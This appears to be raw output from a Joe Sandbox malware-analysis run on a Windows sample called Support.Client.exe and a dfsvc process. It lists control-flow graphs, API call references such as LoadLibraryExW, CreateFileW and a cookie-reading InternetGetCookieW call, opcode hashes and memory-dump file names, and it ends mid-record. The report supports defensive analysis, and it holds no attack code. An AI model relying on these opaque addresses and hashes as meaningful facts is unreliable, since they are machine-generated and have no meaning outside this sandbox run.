                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_c00000_Support.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                  • Opcode ID: 3cc6c72ca58b3871e6c426a28677845e443b04a69c1ae5287b7786f9903ecb83
                                                                                                                                                                                                                                                  • Instruction ID: e8c057d2669d685b0a0a972ad25874fe0be380c4c2ae3dc05a0556d328920d5d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3cc6c72ca58b3871e6c426a28677845e443b04a69c1ae5287b7786f9903ecb83
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A3F062B0A00648BBCB15DF94DC49BAEBFF8EF08756F054065F905A2290DB709E44CB90

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 400 c0634d-c06372 call c03f72 403 c06374-c0637c 400->403 404 c0637f-c063a5 MultiByteToWideChar 400->404 403->404 405 c06444-c06448 404->405 406 c063ab-c063b7 404->406 409 c06454-c06469 call c0123a 405->409 410 c0644a-c0644d 405->410 407 c06403 406->407 408 c063b9-c063ca 406->408 414 c06405-c06407 407->414 411 c063e5-c063eb 408->411 412 c063cc-c063db call c0ac20 408->412 410->409 416 c063ec call c062ff 411->416 419 c0643d-c06443 call c0646a 412->419 426 c063dd-c063e3 412->426 418 c06409-c0642b call c020b0 MultiByteToWideChar 414->418 414->419 422 c063f1-c063f6 416->422 418->419 428 c0642d-c0643b GetStringTypeW 418->428 419->405 422->419 427 c063f8 422->427 429 c063fe-c06401 426->429 427->429 428->419 429->414
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,00C054C8,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 00C0639A
                                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00C063D2
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00C06423
                                                                                                                                                                                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00C06435
                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 00C0643E
                                                                                                                                                                                                                                                    • Part of subcall function 00C062FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00C07E5B,?,00000000,?,00C0686F,?,00000004,00000000,?,?,?,00C03BCD), ref: 00C06331
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2002925505.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002913617.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002938677.0000000000C0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002951164.0000000000C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002962574.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_c00000_Support.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1857427562-0
                                                                                                                                                                                                                                                  • Opcode ID: bbd878e2a9d1dae6303f4e25529e8276fdf24389b8768eacddf7783908bf37c8
                                                                                                                                                                                                                                                  • Instruction ID: b0f86278e524b75f919523d5ad24c3d2e205a7d7d5fcc08c3edb62281984bb08
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bbd878e2a9d1dae6303f4e25529e8276fdf24389b8768eacddf7783908bf37c8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D431CF72A0021AABDF25DFA5DC45EAE7BA5EF00710F054128FC24D71A0E735CE61CBA0

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 430 c0561e-c05633 GetEnvironmentStringsW 431 c05635-c05655 call c055e7 WideCharToMultiByte 430->431 432 c0568b 430->432 431->432 438 c05657 431->438 434 c0568d-c0568f 432->434 435 c05691-c05692 FreeEnvironmentStringsW 434->435 436 c05698-c056a0 434->436 435->436 439 c05658 call c062ff 438->439 440 c0565d-c05662 439->440 441 c05680 440->441 442 c05664-c05678 WideCharToMultiByte 440->442 444 c05682-c05689 call c04869 441->444 442->441 443 c0567a-c0567e 442->443 443->444 444->434
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 00C05627
                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C0564A
                                                                                                                                                                                                                                                    • Part of subcall function 00C062FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00C07E5B,?,00000000,?,00C0686F,?,00000004,00000000,?,?,?,00C03BCD), ref: 00C06331
                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00C05670
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C05683
                                                                                                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C05692
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2002925505.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002913617.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002938677.0000000000C0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002951164.0000000000C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002962574.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_c00000_Support.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2278895681-0
                                                                                                                                                                                                                                                  • Opcode ID: aa75467130686f4f4ecb3d5834054a7ad44630f00ab5ac553990449802389aaf
                                                                                                                                                                                                                                                  • Instruction ID: ed132248b9d38cea910291e7d1c044fed8c06dca44215036f280975b5e18acc8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aa75467130686f4f4ecb3d5834054a7ad44630f00ab5ac553990449802389aaf
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4E01D4B2601A157FE7215AA65C4CE7F6A7DDEC6BA03560229F914C3280EB718D01D9B0

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 447 c044a8-c044bf GetLastError 448 c044c1-c044cb call c05904 447->448 449 c044cd-c044d2 447->449 448->449 454 c0451e-c04525 SetLastError 448->454 450 c044d4 call c0480c 449->450 453 c044d9-c044df 450->453 455 c044e1 453->455 456 c044ea-c044f8 call c0595a 453->456 457 c04527-c0452c 454->457 458 c044e2-c044e8 call c04869 455->458 463 c044fa-c044fb 456->463 464 c044fd-c04513 call c04296 call c04869 456->464 465 c04515-c0451c SetLastError 458->465 463->458 464->454 464->465 465->457
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00C047FE,00C07E79,?,00C0686F,?,00000004,00000000,?,?,?,00C03BCD,?,00000000), ref: 00C044AD
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C044E2
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C04509
                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 00C04516
                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 00C0451F
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2002925505.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002913617.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002938677.0000000000C0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002951164.0000000000C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002962574.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_c00000_Support.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3170660625-0
                                                                                                                                                                                                                                                  • Opcode ID: 00a2c1c348a52d9ab29f6206a9f2d75a2719f6545ee945bdfab2e72491a084d8
                                                                                                                                                                                                                                                  • Instruction ID: e8d662fded650d430531716c388e5cc7f17761d70b110e7ebeab8e2859a68769
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 00a2c1c348a52d9ab29f6206a9f2d75a2719f6545ee945bdfab2e72491a084d8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D0128F6600604ABC21AA7766C45F2F262EEBC67757258224FB29D21D2FF708E01E120

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 470 c06176-c06181 471 c06183-c0618b 470->471 472 c061dc-c061de 470->472 473 c06194-c0619d 471->473 474 c0618d-c06193 call c04869 471->474 476 c061a6-c061af 473->476 477 c0619f-c061a5 call c04869 473->477 474->473 478 c061b1-c061b7 call c04869 476->478 479 c061b8-c061c1 476->479 477->476 478->479 483 c061c3-c061c9 call c04869 479->483 484 c061ca-c061d3 479->484 483->484 484->472 488 c061d5-c061db call c04869 484->488 488->472
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C0618E
                                                                                                                                                                                                                                                    • Part of subcall function 00C04869: HeapFree.KERNEL32(00000000,00000000,?,00C0620D,?,00000000,?,00000000,?,00C06234,?,00000007,?,?,00C0669F,?), ref: 00C0487F
                                                                                                                                                                                                                                                    • Part of subcall function 00C04869: GetLastError.KERNEL32(?,?,00C0620D,?,00000000,?,00000000,?,00C06234,?,00000007,?,?,00C0669F,?,?), ref: 00C04891
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C061A0
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C061B2
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C061C4
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C061D6
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2002925505.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002913617.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002938677.0000000000C0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002951164.0000000000C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002962574.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_c00000_Support.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                                  • Opcode ID: b18a77190c73d9d91c25c2da99e1dcca594e24c09cde0179d92ba6a3933e4332
                                                                                                                                                                                                                                                  • Instruction ID: 30db4fe21e5ae9f108af6fb7687002c0124a8791f0ca84029cbccc54009da8ad
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b18a77190c73d9d91c25c2da99e1dcca594e24c09cde0179d92ba6a3933e4332
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 54F03CB2604204AFCA64EF55F981E5E77DDBB41B107588C05F91AD75D2C635FC80CA60
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C03DAD
                                                                                                                                                                                                                                                    • Part of subcall function 00C04869: HeapFree.KERNEL32(00000000,00000000,?,00C0620D,?,00000000,?,00000000,?,00C06234,?,00000007,?,?,00C0669F,?), ref: 00C0487F
                                                                                                                                                                                                                                                    • Part of subcall function 00C04869: GetLastError.KERNEL32(?,?,00C0620D,?,00000000,?,00000000,?,00C06234,?,00000007,?,?,00C0669F,?,?), ref: 00C04891
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C03DBF
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C03DD2
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C03DE3
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C03DF4
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2002925505.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002913617.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002938677.0000000000C0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002951164.0000000000C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002962574.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_c00000_Support.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                                  • Opcode ID: 1b884bd4cee4bd14358c52b8a813db3aebff0627e0468c9a3df78cfbc2084dba
                                                                                                                                                                                                                                                  • Instruction ID: 5bbd129503dd282d64e0aa8f3955595865eb57e4afe81c708ad5084bef26bd23
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1b884bd4cee4bd14358c52b8a813db3aebff0627e0468c9a3df78cfbc2084dba
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1FF017F98102A0DFCB86AF15FC0178E3B69BB467203588616FB12967F1C7390A51EAC4
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Support.Client.exe,00000104), ref: 00C02F93
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C0305E
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C03068
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2002925505.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002913617.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002938677.0000000000C0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002951164.0000000000C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002962574.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_c00000_Support.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                  • String ID: C:\Users\user\Desktop\Support.Client.exe
                                                                                                                                                                                                                                                  • API String ID: 2506810119-2197628833
                                                                                                                                                                                                                                                  • Opcode ID: 398804efb6670a7826d3f04bd8e47aec4ed8dfee3019393feef5d531cb022dd3
                                                                                                                                                                                                                                                  • Instruction ID: e4393e7c9d13f53c42972e0fc5469b94030d04ae5d844bfa09757fbcdc62f4dc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 398804efb6670a7826d3f04bd8e47aec4ed8dfee3019393feef5d531cb022dd3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E31A2B1A00254AFCB21DF9ADC85A9EBBFCEF85714F144066F90497291D6708F40DB91
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00C02594,00000000,?,00C11B50,?,?,?,00C02737,00000004,InitializeCriticalSectionEx,00C0BC48,InitializeCriticalSectionEx), ref: 00C025F0
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00C02594,00000000,?,00C11B50,?,?,?,00C02737,00000004,InitializeCriticalSectionEx,00C0BC48,InitializeCriticalSectionEx,00000000,?,00C024C7), ref: 00C025FA
                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00C02622
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2002925505.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002913617.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002938677.0000000000C0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002951164.0000000000C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002962574.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_c00000_Support.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                  • String ID: api-ms-
                                                                                                                                                                                                                                                  • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                                  • Opcode ID: ea5728d6694f67645b2611956963453e62e297765dc512203397deca44ca80e3
                                                                                                                                                                                                                                                  • Instruction ID: ea9761c27f659fc03907b5a6153ea9e2ccc247c4f5fe409a5e5331c312ae6907
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ea5728d6694f67645b2611956963453e62e297765dc512203397deca44ca80e3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6FE04870680304BBEF115B60EC0AF5E3F54EB10B55F114421FA1DE40E1E7A2DE54D544
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00C05784,00000000,00000000,00000000,00000000,?,00C05981,00000006,FlsSetValue), ref: 00C0580F
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00C05784,00000000,00000000,00000000,00000000,?,00C05981,00000006,FlsSetValue,00C0C4D8,FlsSetValue,00000000,00000364,?,00C044F6), ref: 00C0581B
                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00C05784,00000000,00000000,00000000,00000000,?,00C05981,00000006,FlsSetValue,00C0C4D8,FlsSetValue,00000000), ref: 00C05829
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2002925505.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002913617.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002938677.0000000000C0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002951164.0000000000C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002962574.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_c00000_Support.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3177248105-0
                                                                                                                                                                                                                                                  • Opcode ID: 6147b7c8a0eef3526404f94980f3ae76742dada194140e76f23e656a490bd091
                                                                                                                                                                                                                                                  • Instruction ID: a9865520a65089e2f2e8f21b6cd1736b9e3bba98f46ca803afa7426a4921404e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6147b7c8a0eef3526404f94980f3ae76742dada194140e76f23e656a490bd091
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A301AC36655622ABC7218B69AC44B5B7798AF057A57118724FD26D71C0D720DD00CEE0

                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                  Execution Coverage:16%
                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                                  Total number of Nodes:116
                                                                                                                                                                                                                                                  Total number of Limit Nodes:11
                                                                                                                                                                                                                                                  execution_graph 27030 7ffd9b88a545 27032 7ffd9b88a54d 27030->27032 27031 7ffd9b8ca055 27032->27031 27034 7ffd9b8b75b0 27032->27034 27035 7ffd9b8b75d5 27034->27035 27036 7ffd9b8b76ed 27035->27036 27038 7ffd9b88a518 27035->27038 27036->27032 27040 7ffd9b8b7830 27038->27040 27039 7ffd9b8b78ac 27039->27035 27040->27039 27041 7ffd9b884c90 LoadLibraryExW 27040->27041 27041->27039 26937 7ffd9b88bf19 26938 7ffd9b88bf2f 26937->26938 26942 7ffd9b88c086 26938->26942 26953 7ffd9b884c90 26938->26953 26940 7ffd9b88bfe6 26944 7ffd9b884c90 LoadLibraryExW 26940->26944 26943 7ffd9b88c12e 26942->26943 26945 7ffd9b88a4c8 26942->26945 26944->26942 26946 7ffd9b88c710 26945->26946 26947 7ffd9b884c90 LoadLibraryExW 26946->26947 26948 7ffd9b88c7a3 26947->26948 26958 7ffd9b88a4c0 26948->26958 26950 7ffd9b88c7b4 26951 7ffd9b884c90 LoadLibraryExW 26950->26951 26952 7ffd9b88c7c2 26950->26952 26951->26952 26952->26942 26954 7ffd9b884cc3 26953->26954 26955 7ffd9b884cb8 26953->26955 26969 7ffd9b883f30 26954->26969 26955->26940 26957 7ffd9b884cc8 26957->26940 26959 7ffd9b88d350 26958->26959 26960 7ffd9b88d460 26959->26960 26961 7ffd9b88d3cc 26959->26961 26963 7ffd9b884c90 LoadLibraryExW 26960->26963 26966 7ffd9b88d449 26960->26966 26962 7ffd9b884c90 LoadLibraryExW 26961->26962 26962->26966 26963->26966 26964 7ffd9b88d62c 26964->26950 26965 7ffd9b88d5db 26968 7ffd9b884c90 LoadLibraryExW 26965->26968 26966->26964 26966->26965 26967 7ffd9b884c90 LoadLibraryExW 26966->26967 26967->26965 26968->26964 26971 7ffd9b883f55 26969->26971 26972 7ffd9b8815c8 LoadLibraryExW 26969->26972 26971->26957 26972->26971 27042 7ffd9b88994b 27043 7ffd9b889957 CreateFileW 27042->27043 27045 7ffd9b889a8c 27043->27045 26973 7ffd9b886118 26975 7ffd9b8c2e00 26973->26975 26974 7ffd9b886110 2 API calls 26980 7ffd9b8c2fb7 26974->26980 26976 7ffd9b8c2fa4 26975->26976 26979 7ffd9b8c3000 26975->26979 26981 7ffd9b8c2f17 26975->26981 26977 7ffd9b8c2faa 26976->26977 26976->26979 26984 7ffd9b886110 26977->26984 26979->26974 26981->26980 26982 7ffd9b884c90 LoadLibraryExW 26981->26982 26983 7ffd9b8c2f9b 26982->26983 26985 7ffd9b8c6150 26984->26985 26988 7ffd9b8c3928 26985->26988 26987 7ffd9b8c61a9 26990 7ffd9b8c7950 26988->26990 26991 7ffd9b8c7a1a 26990->26991 26994 7ffd9b881548 26990->26994 26992 7ffd9b884c90 LoadLibraryExW 26991->26992 26993 7ffd9b8c7a90 26992->26993 26993->26987 26996 7ffd9b881551 26994->26996 26995 7ffd9b881683 26995->26990 26996->26995 26997 7ffd9b881802 LoadLibraryExW 26996->26997 26998 7ffd9b881836 26997->26998 26998->26990 27067 7ffd9b8836d7 27068 7ffd9b8836e3 27067->27068 27071 7ffd9b882f80 27068->27071 27070 7ffd9b88370a 27072 7ffd9b8858a0 27071->27072 27075 7ffd9b882f00 27072->27075 27074 7ffd9b885929 27074->27070 27076 7ffd9b885990 27075->27076 27077 7ffd9b883f30 LoadLibraryExW 27076->27077 27078 7ffd9b8859b4 27077->27078 27078->27074 27079 7ffd9b88e8d2 27080 7ffd9b88e8ff InternetGetCookieW 27079->27080 27082 7ffd9b88eac9 27080->27082 26999 7ffd9b883d36 27000 7ffd9b883d3d 26999->27000 27005 7ffd9b882e48 27000->27005 27002 7ffd9b883e2a 27011 7ffd9b882e20 27002->27011 27006 7ffd9b883e70 27005->27006 27018 7ffd9b882e08 27006->27018 27008 7ffd9b883ec9 27008->27002 27009 7ffd9b883e8a 27009->27008 27022 7ffd9b882e30 27009->27022 27013 7ffd9b882e25 27011->27013 27012 7ffd9b882e59 27013->27012 27014 7ffd9b882e08 LoadLibraryExW 27013->27014 27016 7ffd9b883e8a 27014->27016 27015 7ffd9b883e4c 27016->27015 27017 7ffd9b882e30 LoadLibraryExW 27016->27017 27017->27015 27019 7ffd9b883f30 27018->27019 27021 7ffd9b883f55 27019->27021 27029 7ffd9b8815c8 LoadLibraryExW 27019->27029 27021->27009 27024 7ffd9b882e35 27022->27024 27023 7ffd9b882e59 27024->27023 27025 7ffd9b882e08 LoadLibraryExW 27024->27025 27027 7ffd9b883e8a 27025->27027 27026 7ffd9b883ec9 27026->27008 27027->27026 27028 7ffd9b882e30 LoadLibraryExW 27027->27028 27028->27026 27029->27021 27054 7ffd9b8834b6 27057 7ffd9b8834cb 27054->27057 27056 7ffd9b88378e 27058 7ffd9b883c81 27057->27058 27059 7ffd9b883cae 27058->27059 27060 7ffd9b882e48 LoadLibraryExW 27059->27060 27061 7ffd9b883d19 27060->27061 27061->27056 27046 7ffd9b884b75 27047 7ffd9b884b7f 27046->27047 27048 7ffd9b883f30 LoadLibraryExW 27047->27048 27049 7ffd9b884bad 27048->27049

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.2543831025.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ffd9b880000_dfsvc.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: P$x]<P
                                                                                                                                                                                                                                                  • API String ID: 0-1534737675
                                                                                                                                                                                                                                                  • Opcode ID: bb8842ca23b44b9ec8193c7dce4d9fccdff621c3311e502ea96cad1af79c5b54
                                                                                                                                                                                                                                                  • Instruction ID: 3f372b06c1d7de1be879c2ff3474bbd669a78ecb3f82d6adeb67550b7118808b
